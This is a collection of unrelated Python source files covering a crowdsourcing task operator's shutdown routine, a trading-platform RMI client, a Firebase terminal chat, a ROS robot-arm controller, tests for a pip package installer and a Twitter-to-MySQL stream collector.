tracked_run.architect.shutdown()
def shutdown_supervisor():
if self.supervisor is not None:
self.supervisor.shutdown()
tasks = {
"expire-units": end_launchers_and_expire_units,
"kill-architects": end_architects,
"fire-supervisor": shutdown_supervisor,
}
for tname, t in tasks.items():
shutdown_thread = threading.Thread(target=t, name=f"force-shutdown-{tname}")
shutdown_thread.start()
start_time = time.time()
while time.time() - start_time < timeout and shutdown_thread.is_alive():
time.sleep(0.5)
if not shutdown_thread.is_alive():
# Only join if the shutdown fully completed
shutdown_thread.join()
def shutdown(self, skip_input=True):
logger.info("operator shutting down")
self.is_shutdown = True
runs_to_check = list(self._task_runs_tracked.items())
for run_id, tracked_run in runs_to_check:
logger.info(f"Expiring units for task run {run_id}.")
try:
tracked_run.task_launcher.shutdown()
except (KeyboardInterrupt, SystemExit) as e:
logger.info(
f"Skipping waiting for launcher threads to join on task run {run_id}."
)
def cant_cancel_expirations(sig, frame):
logger.warning(
"Ignoring ^C during unit expirations. Use ^\\ if you NEED to exit, and you will "
"have to clean up any units that hadn't been expired afterwards."
)
old_handler = signal.signal(signal.SIGINT, cant_cancel_expirations)
tracked_run.task_launcher.expire_units()
signal.signal(signal.SIGINT, old_handler)
try:
remaining_runs = self._task_runs_tracked.values()
while len(remaining_runs) > 0:
next_runs = []
for tracked_run in remaining_runs:
if tracked_run.task_run.get_is_completed():
tracked_run.architect.shutdown()
else:
next_runs.append(tracked_run)
if len(next_runs) > 0:
logger.info(
f"Waiting on {len(remaining_runs)} task runs with assignments in-flight "
f"Ctrl-C ONCE to kill running tasks and FORCE QUIT."
)
time.sleep(30)
remaining_runs = next_runs
except Exception as e:
logger.exception(
f"Encountered problem during shutting down {e}", exc_info=True
)
import traceback
traceback.print_exc()
except (KeyboardInterrupt, SystemExit) as e:
logger.info(
"Skipping waiting for outstanding task completions, shutting down servers now!"
)
for tracked_run in remaining_runs:
logger.info(
f"Shutting down Architect for task run {tracked_run.task_run.db_id}"
)
tracked_run.architect.shutdown()
finally:
self.supervisor.shutdown()
self._run_tracker_thread.join()
def validate_and_run_config(
self, run_config: DictConfig, shared_state: Optional[SharedTaskState] = None
) -> Optional[str]:
"""
Wrapper around validate_and_run_config_or_die that prints errors on
failure, rather than throwing. Generally for use in scripts.
"""
try:
return self.validate_and_run_config_or_die(
run_config=run_config, shared_state=shared_state
)
except (KeyboardInterrupt, Exception) as e:
logger.error("Ran into error while launching run: ", exc_info=True)
return None
def parse_and_launch_run_wrapper(
self,
arg_list: Optional[List[str]] = None,
extra_args: Optional[Dict[str, Any]] = None,
) -> Optional[str]:
"""
Wrapper around parse and launch run that prints errors on failure, rather
than throwing. Generally for use in scripts.
"""
raise Exception(
"Operator.parse_and_launch_run_wrapper has been deprecated in favor "
"of using Hydra for argument configuration. See the docs at "
"https://github.com/facebookresearch/Mephisto/blob/master/docs/hydra_migration.md "
"in order to upgrade."
)
def print_run_details(self):
"""Print details about running tasks"""
# TODO(#93) parse these tasks and get the full details
for task in self.get_running_task_runs():
logger.info(f"Operator running task ID = {task}")
def wait_for_runs_then_shutdown(
self, skip_input=False, log_rate: Optional[int] = None
) -> None:
"""
Wait for task_runs to complete, and then shutdown.
Set log_rate to get print statements of currently running tasks
at the specified interval
"""
try:
try:
last_log = 0.0
while len(self.get_running_task_runs()) > 0:
if log_rate is not None:
if time.time() - last_log > log_rate:
last_log = time.time()
self.print_run_details()
time.sleep(RUN_STATUS_POLL_TIME)
except Exception as e:
if skip_input:
raise e
traceback.print_exc()
should_quit = input(
"The above exception happened while running a task, do "
"you want to shut down? (y)/n: "
)
if should_quit not in ["n", "N", "no", "No"]:
raise e
except Exception as e:
import traceback
traceback.print_exc()
except (KeyboardInterrupt, SystemExit) as e:
logger.exception(
"Cleaning up after keyboard interrupt, please wait!", exc_info=True
)
finally:
self.shutdown()
|
geyaApi.py
|
# encoding: utf-8
import urllib
import hashlib
import os
import jpype
from jpype import *
import math
import requests
from Queue import Queue, Empty
from threading import Thread
from time import sleep
LHANG_API_ROOT = "https://api.lhang.com/v1/"
FUNCTION_TICKER = 'FUNCTION_TICKER'
FUNCTION_ALL_TICKER = 'FUNCTION_ALL_TICKER'
FUNCTION_CREATEORDER = 'FUNCTION_CREATEORDER'
# constants below are referenced by cancelOrder/getOrdersInfo/getOrdersInfoHistory further down
FUNCTION_CANCELORDER = 'FUNCTION_CANCELORDER'
FUNCTION_ORDERSINFO = 'FUNCTION_ORDERSINFO'
FUNCTION_ORDERSINFOHISTORY = 'FUNCTION_ORDERSINFOHISTORY'
########################################################################
class GeyaBase(object):
""""""
DEBUG = True
# ----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.apiKey = ''
self.secretKey = ''
self.interval = 1 # wait interval between requests
self.active = False # API running state
self.reqID = 0 # request id counter
self.reqQueue = Queue() # request queue
self.reqThread = Thread(target=self.processQueue) # request processing thread
# ----------------------------------------------------------------------
def init(self):
"""初始化"""
self.active = True
self.reqThread.start()
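# Typical usage sketch (symbol and RMI host/port values are placeholders):
#   api = GeyaBase()
#   api.init()
#   api.getTicker('USD/CNY', 'BUY', '127.0.0.1', '1099')  # result arrives via onGetTicker
#   api.exit()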
# ----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
# ----------------------------------------------------------------------
# TODO: refactor; this interface needs to be abstracted at a higher level
def processRequest(self, req):
"""Process a single request"""
# read the method and parameters
method = req['function']
params = req['params']
# url = LHANG_API_ROOT + api
if method == FUNCTION_TICKER: # query the best cover-trade quota
r = self.queryTradePrice(params)
elif method == FUNCTION_ALL_TICKER: # query all cover-trade quotas; return directly, this response carries no error code
r = self.queryAllTradePrice(params)
data = {'code': '00000', 'resList': r}
return data
elif method == FUNCTION_CREATEORDER: # cover trade (place order)
r = self.coverTrade(params)
if r.code == '00000':
if method == FUNCTION_TICKER: # query the best cover-trade quota
data = {'code': r.code, 'message': r.message, 'exnm': r.exnm, 'tradeSide': r.tradeSide, 'status': r.status,
'tradeLimitAmount': r.tradeLimitAmount, 'price': r.price}
elif method == FUNCTION_CREATEORDER: # cover trade; the response may contain multiple fill records
data = {'code': r.code, 'message': r.message, 'trsn': r.trsn, 'exnm': r.exnm, 'prcd': r.prcd,
'direction': params['tradeSide'], 'details': r.details}
else:
data = None
return data
# ----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
req = self.reqQueue.get(block=True, timeout=1) # block for up to one second waiting for a request
#req = self.reqQueue.get(block=False) # non-blocking get
if req is None:
continue
callback = req['callback']
reqID = req['reqID']
#start the JVM if it is not already running
if not jpype.isJVMStarted():
# start the Java virtual machine
jarpath = os.path.join(os.path.abspath('.'), 'RmiInterface.jar')
print jarpath
print jpype.getDefaultJVMPath()
#jpype.startJVM(jpype.getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
jpype.startJVM(jpype.getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
data = self.processRequest(req)
# request failed
if data is None:
error = u'Request failed'
self.onError(error, req, reqID)
# request succeeded
elif data['code'] == '00000':
if self.DEBUG:
print callback.__name__
callback(data, req, reqID)
# request failed
else:
error = u'Request error, error code: %s' % data['code']
self.onError(error, req, reqID)
#finally:
# jpype.shutdownJVM()
# flow-control wait
#sleep(self.interval)
except Empty:
pass
except jpype.JavaException, ex:
print ex.javaClass(),ex.message()
print ex.stacktrace()
# ----------------------------------------------------------------------
def sendRequest(self, function, params, callback):
"""发送请求"""
# 请求编号加1
self.reqID += 1
# 生成请求字典并放入队列中
req = {}
req['function'] = function
req['params'] = params
req['callback'] = callback
req['reqID'] = self.reqID
self.reqQueue.put(req)
# return the request id
return self.reqID
# ----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print error, req, reqID
###############################################
# Market data interface
###############################################
# ----------------------------------------------------------------------
def getTicker(self, symbol, direction, rmiIp, rmiPort):
"""#查询平盘最优额度"""
function = FUNCTION_TICKER
params = {'symbol': symbol,
'direction': direction,
'rmiIp': rmiIp,
'rmiPort': rmiPort}
callback = self.onGetTicker
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getDepth(self, symbol, rmiIp, rmiPort):
"""查询深度"""
function = FUNCTION_ALL_TICKER
params = {
'symbol': symbol,
'rmiIp': rmiIp,
'rmiPort': rmiPort}
callback = self.onGetDepth
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetTicker(self, data, req, reqID):
"""查询行情回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetDepth(self, data, req, reqID):
"""查询深度回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetTrades(self, data, req, reqID):
"""查询历史成交"""
print data, reqID
# ----------------------------------------------------------------------
def onGetKline(self, data, req, reqID):
"""查询K线回报"""
print data, reqID
###############################################
# Trading interface
###############################################
# ----------------------------------------------------------------------
def createOrder(self, serial, prcd, exnm, reqDate, reqTime, volume, ppds, tradeSide, akpc, rrdc):
"""发送委托"""
function = FUNCTION_CREATEORDER
params = {
'serial': serial,
'prcd': prcd,
'exnm': exnm,
'reqDate': reqDate,
'reqTime': reqTime,
'volume': volume,
'ppds': ppds,
'tradeSide': tradeSide,
'akpc': akpc,
'rrdc': rrdc
}
callback = self.onCreateTrade
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def cancelOrder(self, symbol, orderId):
"""撤单"""
function = FUNCTION_CANCELORDER
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onCancelOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfo(self, symbol, orderId):
"""查询委托"""
function = FUNCTION_ORDERSINFO
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onGetOrdersInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfoHistory(self, symbol, status, currentPage, pageLength):
"""撤单"""
function = FUNCTION_ORDERSINFOHISTORY
params = {
'symbol': symbol,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
callback = self.onGetOrdersInfoHistory
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetUserInfo(self, data, req, reqID):
"""查询账户信息"""
print data, reqID
# ----------------------------------------------------------------------
def onCreateOrder(self, data, req, reqID):
"""委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfo(self, data, req, reqID):
"""查询委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfoHistory(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# Call the auto cover-trade platform's best-quota query interface
# def queryTradePrice(self, exnm, tradeSide, rmiIp, rmiPort):
def queryTradePrice(self, params):
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CheckHydraTradeInfoRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoRequest')
# CheckHydraTradeInfoResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoResponse')
TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# call the Java RMI interface from Python
remoteObj = namingContext.lookup(
"rmi://" + params['rmiIp'] + ":" + params['rmiPort'] + "/HydraTradeService")
request = CheckHydraTradeInfoRequest()
request.setExnm(params['symbol'])
if params['direction'] == "BUY":
request.setTradeSide(TradeSide.BUY)
elif params['direction'] == "SELL":
request.setTradeSide(TradeSide.SELL)
resp = remoteObj.sendCheckForDeal(request)
return resp
# Call the auto cover-trade platform's query for all cover-trade quotas
def queryAllTradePrice(self, params):
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CheckHydraTradeAllInfoRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeAllInfoRequest')
# CheckHydraTradeInfoResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoResponse')
# TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# call the Java RMI interface from Python
remoteObj = namingContext.lookup(
"rmi://" + params['rmiIp'] + ":" + params['rmiPort'] + "/HydraTradeService")
request = CheckHydraTradeAllInfoRequest()
request.setExnm(params['symbol'])
resp = remoteObj.sendCheckForDealAll(request)
return resp
# Call the auto cover-trade platform's cover-trade (order) interface
def coverTrade(self, params):
# jarpath = os.path.join(os.path.abspath('.'), 'RmiInterface.jar')
# startJVM(getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CallHydraTradeRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CallHydraTradeRequest')
CallHydraTradeResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CallHydraTradeResponse')
TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# call the Java RMI interface from Python
remoteObj = namingContext.lookup(
"rmi://" + self.gateway.rmiIp + ":" + self.gateway.rmiPort + "/HydraTradeService")
rmiRequst = CallHydraTradeRequest()
rmiRequst.setTrsn(params['serial'])
rmiRequst.setPrcd(params['prcd'])
rmiRequst.setRqdt(params['reqDate'])
rmiRequst.setRqtm(params['reqTime'])
rmiRequst.setPpds(params['ppds'])
rmiRequst.setExnm(params['exnm']) # may need conversion
if params['tradeSide'] == "BUY":
rmiRequst.setTradeSide(TradeSide.BUY)
elif params['tradeSide'] == "SELL":
rmiRequst.setTradeSide(TradeSide.SELL)
BigDecimal = jpype.java.math.BigDecimal
rmiRequst.setAmut(BigDecimal(params['volume']))
rmiRequst.setAkpc(BigDecimal(params['akpc']))
rmiRequst.setRrdc(BigDecimal(params['rrdc']))
# resp = CheckHydraTradeInfoResponse()
resp = remoteObj.callHydraTrade(rmiRequst)
return resp
|
firebaseversion.py
|
#!/usr/bin/env python3
#doing all needed imports
from os import system
from firebase import firebase
import threading
import subprocess as s
from sys import argv
from datetime import datetime
from playsound import playsound
#flag for the notification-sound toggle below
sound = True
#pass --notification-sound-off on the command line to disable the notification sound
if len(argv) > 1:
if argv[1] == "--notification-sound-off":
sound = False
#ask the user for a username (no spaces allowed)
username = ' ' + input("Type in your username: ") + ": "
while " " in username.strip():
username = ' ' + input("Type in your username (you cannot separate words with spaces): ") + ": "
#it's "cls" for windows, here we'll clear console to everything looks ok
system("clear")
#thanks to Python code won't work if this line doesn't exist
result = "\nSEND MESSAGE\n"
#we're creating db for our messages
fb = firebase.FirebaseApplication("https://dbcfv-60641-default-rtdb.europe-west1.firebasedatabase.app/", None)
#it is our old data so we can compare it with new and messages will be updated
old_data = {}
#it's a function where we take user's input
def get_input_from_the_user():
while True:
#read a message; emoticon shortcuts are replaced with emoji below
message = input("Type your message: ")
if "(yes)" in message:
message = message.replace("(yes)", "👍")
if "(y)" in message:
message = message.replace("(y)", "👍")
if "(no)" in message:
message = message.replace("(no)", "👎")
if "(cryingwithlaughter)" in message:
message = message.replace("(cryingwithlaughter)", "😂")
if message == "/clear":
fb.delete('Message', '')
if message.startswith("/edit"):
message_id = ""
message = message.split()
if len(message) > 3:
time_and_username = message[1] + " " + message[2]
if username.strip().startswith(message[2].strip()):
edited_message = ""
for word in message:
if message.index(word) > 2:
edited_message += word + " "
for msg in messages:
if messages[msg]["Message"].startswith(time_and_username):
message_id = msg
fb.put(f'Message/{message_id}/', 'Message', str(datetime.now().time())[:8] + username + "EDITED " + edited_message)
else: print("You can only edit your own messages.", username, message[2])
else:
Smessage = str(datetime.now().time())[:8] + username + message
#payload holding the timestamped message
data = {
'Message':Smessage
}
#post the message to the database
fb.post('Message', data)
#run input handling in a separate thread so we can read input and print messages at the same time
thread = threading.Thread(target=get_input_from_the_user)
thread.start()
#main loop: poll the database and print new messages
while True:
#fetch messages from the database
messages = fb.get(f'/Message/', '')
#if any messages exist:
if messages:
if old_data != messages: #if something changed since the last poll:
try:
message = messages[list(messages.keys())[-1]]["Message"]
print(message)
author = message.split()[1].strip()
if " " + author + " " != username:
#create notification banner
s.call(['notify-send','Perfect Messenger', message])
if sound: playsound("noti2.wav") #play the notification sound if it is enabled
#clear the console so everything looks clean (use "cls" on Windows)
system('clear')
for message in messages:
print(messages[message]["Message"])
old_data = messages
print(result)
except Exception as e:
print(e)
|
xarm_controller.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import time
import threading
import xarm_servo_controller
from std_msgs.msg import Float64MultiArray
from std_srvs.srv import SetBool, SetBoolResponse
from xarm.msg import JointCmd
def RAD_2_DEG(x):
return(x * 180.0 / np.pi)
def DEG_2_RAD(x):
return(x * np.pi / 180.0)
class Joint:
'''
Basic structure to define each joint
'''
def __init__(self, id, name):
self.id = id
self.name = name
class xArmController:
'''
Send and receive commands to/from the xarm.
'''
def __init__(self, node_name="xarm_controller", port="/dev/ttyACM0"):
'''
'''
self.node_name = node_name
rospy.init_node(node_name)
#Servo control module
self.arm = xarm_servo_controller.Controller(port, debug=False)
#subscribe to joint commands
rospy.Subscriber("joint_cmd", JointCmd, self._joint_cmd_callback)
#publish the estimated joint states (these are simply interpolated)
self.joint_state_pub = rospy.Publisher("joint_states", Float64MultiArray, queue_size=10)
#joint state estimation thread.
state_estimation_thread = threading.Thread(target=self._state_estimation_thread, daemon=True)
#Arm control mode service
#Mode 1: Execution mode -> joint_cmds are sent to the xarm servos
#Mode 2: Waypoint collection mode -> commanding the servo joints is
# inactive. The xarm instead directly reads the joint state from
# the servos themselves.
self.mode_service = rospy.Service("xarm_control_mode", SetBool, self._control_mode_callback)
self.mode = "EXECUTION"
#The ID orders may be different depending on how the arm is assembled.
self.J1 = Joint(id=2, name='joint_1')
self.J2 = Joint(3, 'joint_2')
self.J3 = Joint(4, 'joint_3')
self.J4 = Joint(5, 'joint_4')
self.J5 = Joint(6, 'joint_5')
self.GRIPPER = Joint(1, 'gripper')
self.joint_list = [self.J1, self.J2, self.J3, self.J4, self.J5, self.GRIPPER]
self.joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) #radians
self.set_joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) #radians
self.set_joint_duration = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0]) #seconds
#zero the robotic arm
self._set_joint_positions(self.set_joint_state)
self.prev_joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
#Update at 100Hz.
self.looping_rate = rospy.Rate(100)
self.threading_looping_rate = rospy.Rate(200)
self.start_state_estimation = False
self.state_estimation_running = True
state_estimation_thread.start()
def _joint_cmd_callback(self, msg):
'''
Callback function for receiving published joint commands.
Execute the command by sending the desired joint positions to the arm.
'''
joint_positions = list(msg.joint_pos)
joint_durations = list(msg.duration)
if(self.mode == "EXECUTION"):
self._set_joint_positions(joint_positions, joint_durations)
else:
rospy.logwarn("Cannot execute joint command. xArm controller in 'WAYPOINT' collection mode.")
def _set_joint_positions(self, joint_positions, durations=[1000, 1000, 1000, 1000, 1000, 1000]):
'''
Set the joint positions of the arm, reaching the desired position for each joint within
the given movement duration for that joint (measured in milliseconds).
@param durations: time, in milliseconds, for each joint to move from its current state to the desired state.
'''
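#Example (hypothetical values): move all joints to 0.5 rad over 2 seconds:
#  self._set_joint_positions([0.5] * 6, durations=[2000] * 6)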
for index, joint in enumerate(self.joint_list):
if joint.name == "joint_4":
joint_positions[index] *= -1
self.arm.setPosition(joint.id, RAD_2_DEG(joint_positions[index]), duration=int(durations[index]), wait=False)
#Do a timer thingy here to estimate the current joint state
self.set_joint_state = np.array(joint_positions)
self.set_joint_duration = np.array(durations) / 1000.0
self.prev_joint_state = np.copy(self.joint_state)
self.start_state_estimation = True #kickoff the state estimation thread
def _control_mode_callback(self, req):
'''
Callback handle for the mode selection service to change the control mode
of the xarm.
'''
if(req.data):
self.mode = "EXECUTION"
else:
#turn off motors
self.arm.servoOff([joint.id for joint in self.joint_list])
self.mode = "WAYPOINT"
rospy.loginfo("xArm control mode changed to %s", self.mode)
response = SetBoolResponse()
response.success = True
response.message = self.mode
return response
def _state_estimation_thread(self):
'''
A thread that estimates the state of the joints given the joint command and the runtime since the
joint command was started.
'''
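#The estimate below is a simple linear interpolation between the previous and the commanded
#joint state:
#  joint_state(t) = prev_joint_state + (set_joint_state - prev_joint_state) / set_joint_duration * t
#until t reaches each joint's duration, after which that joint is pinned to its target.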
joint_state_msg = Float64MultiArray()
while(self.state_estimation_running):
if(self.start_state_estimation): #kickoff the predictions of state when a new joint state command is received.
self.start_state_estimation = False
start_time = time.time()
delta_t = 0.0
state_unreached = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
elapsed_time = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
m = (self.set_joint_state - self.prev_joint_state) / self.set_joint_duration
#estimate each of the joint states
while((not self.start_state_estimation) and (delta_t <= np.max(self.set_joint_duration))):
self.joint_state = self.prev_joint_state + m * elapsed_time
delta_t = time.time() - start_time
elapsed_time = state_unreached * delta_t
#determine which joints have reached their intended states
#if a joint has reached its state, don't update its joint state
#any more
for i in range(6):
if(delta_t >= self.set_joint_duration[i]):
state_unreached[i] = 0.0
self.joint_state[i] = self.set_joint_state[i]
else:
state_unreached[i] = 1.0
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
elif(self.mode == "WAYPOINT"):
#Read the state of each servo directly. This is very slow because
#of the request and response time of serial data to each servo.
#unfortunately the read is so slow that the publish rate in this
#mode is < 10Hz.
for index, joint in enumerate(self.joint_list):
position = self.arm.getPosition(joint.id, True)
if(joint.name == "joint_4"):
position *= -1
self.joint_state[index] = DEG_2_RAD(position)
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
else:
#publish the joint state
joint_state_msg.data = list(self.joint_state)
self.joint_state_pub.publish(joint_state_msg)
self.threading_looping_rate.sleep()
def run(self):
'''
Main running loop. Publishes joint states at set frequency.
'''
try:
while not rospy.is_shutdown():
#publish the joint states at 100Hz.
#joint_state_msg = Float64MultiArray()
#joint_state_msg.data = list(self.joint_state)
#self.joint_state_pub.publish(joint_state_msg)
self.looping_rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == "__main__":
xarm = xArmController()
xarm.run()
|
test_pip_package_installer.py
|
import os
import re
import pytest
import threading
from script_runner import PipPackageInstaller
@pytest.mark.pip_package_installer
def test_property_access_1():
pip_package_installer = PipPackageInstaller()
with pytest.raises(InterruptedError, match=r".*once.*script.*completed.*"):
pip_package_installer.output
with pytest.raises(InterruptedError, match=r".*once.*script.*completed.*"):
pip_package_installer.result
pip_package_installer.run()
with pytest.raises(InterruptedError, match=r".*packages.*installed.*"):
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 0
@pytest.mark.pip_package_installer
def test_property_threaded_access_1():
pip_package_installer = PipPackageInstaller()
thread_count = 10
success_runs, failed_runs = 0, 0
def thread_function():
nonlocal pip_package_installer, success_runs, failed_runs
try:
pip_package_installer.run()
success_runs = success_runs + 1
except InterruptedError:
failed_runs = failed_runs + 1
threads = [
threading.Thread(target=thread_function) for _ in range(thread_count)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert success_runs == 1
assert failed_runs == thread_count - 1
@pytest.mark.pip_package_installer
def test_property_threaded_access_2():
pip_package_installer = PipPackageInstaller()
predicted = 0
def thread_function_run(should_fail: bool):
nonlocal pip_package_installer, predicted
try:
pip_package_installer.run()
predicted = predicted + int(not should_fail) * 2 - 1
except InterruptedError:
predicted = predicted + int(should_fail) * 2 - 1
def thread_function_property(should_fail: bool):
nonlocal pip_package_installer, predicted
try:
_ = pip_package_installer.output
_ = pip_package_installer.result
predicted = predicted + int(not should_fail) * 2 - 1
except InterruptedError:
predicted = predicted + int(should_fail) * 2 - 1
thread1 = threading.Thread(target=thread_function_property, args=(True, ))
thread2 = threading.Thread(target=thread_function_property, args=(True, ))
thread1.start(), thread2.start()
thread1.join(), thread2.join()
assert predicted == 2
thread3 = threading.Thread(target=thread_function_run, args=(False, ))
thread4 = threading.Thread(target=thread_function_run, args=(False, ))
thread3.start(), thread4.start()
thread3.join(), thread4.join()
assert predicted == 2
thread5 = threading.Thread(target=thread_function_property, args=(False, ))
thread6 = threading.Thread(target=thread_function_property, args=(True, ))
thread5.start(), thread6.start()
thread5.join(), thread6.join()
assert predicted == 2
@pytest.mark.pip_package_installer
@pytest.mark.parametrize("packages", [[("requests", "2.18.4")],
[("requests", "2.18.4"),
("random-profile", "0.0.5"),
("empty-package", "0.0.1")],
[("empty-package", "0.0.3"),
("rsokl-dummy", "0.1.2")]])
def test_install_packages_1(packages):
packages_to_install = "\n".join(f"{package}=={version}"
for package, version in packages)
pip_package_installer = PipPackageInstaller(packages=packages_to_install)
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 0
for package, version in packages:
sys_pip_packages = os.popen("pip list").read()
pattern = f"{re.escape(package)}.*{re.escape(version)}"
assert bool(re.search(pattern, sys_pip_packages))
@pytest.mark.pip_package_installer
@pytest.mark.parametrize("package, version",
[("inexistent_package", "0.69.42.0"),
("some_random_XXX_pack", "1.2.3"),
("requests", "10.99.33")])
def test_install_packages_2(package, version):
package_to_install = f"{package}=={version}"
pip_package_installer = PipPackageInstaller(packages=package_to_install)
pip_package_installer.run()
print(pip_package_installer.output, pip_package_installer.result)
assert pip_package_installer.result == 1
assert "No matching distribution found" in pip_package_installer.output
|
find_tweets.py
|
import configparser
import tweepy
import argparse
import json
import pymysql.cursors
import logging
import logging.config
import datetime
import threading
import time
class Log:
logs = logging.getLogger('find_tweets')
class Config:
def __init__(self, filename="find-tweets.cfg", logger=None):
self.filename = filename
config = configparser.SafeConfigParser({'mysql_port': 3306})
try:
with open(filename) as f:
config.readfp(f)
except IOError:
self.logger.critical("Error opening config file {}!".format(filename))
exit()
try:
self.consumer_token = config.get("Twitter auth", "consumer_token")
except configparser.NoOptionError:
Log.logs.critical("Missing consumer_token in 'Twitter auth' section in config file!")
exit()
try:
self.consumer_secret = config.get("Twitter auth", "consumer_secret")
except configparser.NoOptionError:
Log.logs.critical("Missing consumer_secret in 'Twitter auth' section in config file!")
exit()
try:
self.access_token = config.get("Twitter auth", "access_token")
except configparser.NoOptionError:
Log.logs.critical("Missing access_token in 'Twitter auth' section in config file!")
exit()
try:
self.access_token_secret = config.get("Twitter auth", "access_token_secret")
except configparser.NoOptionError:
Log.logs.critical("Missing access_token_secret in 'Twitter auth' section in config file!")
try:
self.search_terms = [e.strip() for e in config.get("Twitter", "search_terms").split(",")]
except configparser.NoOptionError:
Log.logs.critical("Missing search_terms in 'Twitter' section in config file!")
try:
self.mysql_server = config.get("mysql", "server")
except configparser.NoOptionError:
Log.logs.critical("Missing server in 'mysql' section in config file!")
self.mysql_port = int(config.get("mysql", "server_port"))
try:
self.mysql_username = config.get("mysql", "username")
except configparser.NoOptionError:
Log.logs.critical("Missing username in 'mysql' section in config file!")
try:
self.mysql_password = config.get("mysql", "password")
except configparser.NoOptionError:
Log.logs.critical("Missing password in 'mysql' section in config file!")
try:
self.mysql_db_name = config.get("mysql", "db_name")
except configparser.NoOptionError:
Log.logs.critical("Missing db_name in 'mysql' section in config file!")
def check_updates(self, config_change):
# watch config file
config_change.set()
class SearchStream(tweepy.StreamListener):
def __init__(self, db):
self.db = db
super(SearchStream, self).__init__()
def on_data(self, data):
Log.logs.debug(str(data))
data_dict = json.loads(data)
Log.logs.debug(str(data_dict))
self.db.insert_tweet(data_dict["user"]["name"], data_dict["user"]["screen_name"], data_dict["id"], data_dict["text"], data_dict["created_at"])
def on_error(self, status):
if status == "420":
print("420 error")
return False
def twitter_search(config, config_change):
db = MySQL(config)
listener = SearchStream(db)
oauth = tweepy.OAuthHandler(config.consumer_token, config.consumer_secret)
oauth.set_access_token(config.access_token, config.access_token_secret)
stream = tweepy.Stream(auth=oauth, listener=listener)
Log.logs.info("Starting twitter stream")
stream.filter(track=config.search_terms, is_async=True) # 'async' is a reserved word in Python 3.7+; tweepy 3.7+ uses is_async
while True:
config_change.wait()
Log.logs.info("Config change detected!")
Log.logs.debug("New search terms: {}".format(config.search_terms))
stream.disconnect()
time.sleep(20)
stream.filter(track=config.search_terms, is_async=True)
class MySQL:
def __init__(self, config):
try:
self.connection = pymysql.connect(host=config.mysql_server, user=config.mysql_username, password=config.mysql_password, db=config.mysql_db_name, port=config.mysql_port, charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
except pymysql.Error as e:
log.logs.critical("MySQL: unable to open connection: {}".format(str(e)))
def insert_tweet(self, username, screen_name, id, text, date):
try:
with self.connection.cursor() as cursor:
# parameterized query: let the driver handle quoting/escaping of the values
cursor.execute("""INSERT INTO `tweets`
(`username`, `screen_name`, `id`, `text`, `date`)
VALUES (%s, %s, %s, %s, %s)""", (username, screen_name, id, text, date))
self.connection.commit()
except pymysql.Error as e:
Log.logs.critical("MySQL: error inserting into the DB: {}".format(str(e)))
# the connection is kept open so later tweets from the stream can be inserted
if __name__ == "__main__":
Log.logs.info("Starting find_tweets")
parser = argparse.ArgumentParser(description="Find tweets and dump them into a database")
parser.add_argument("--config", nargs="?", default="find-tweets.cfg", help="config file to use (default is find_tweets.cfg)")
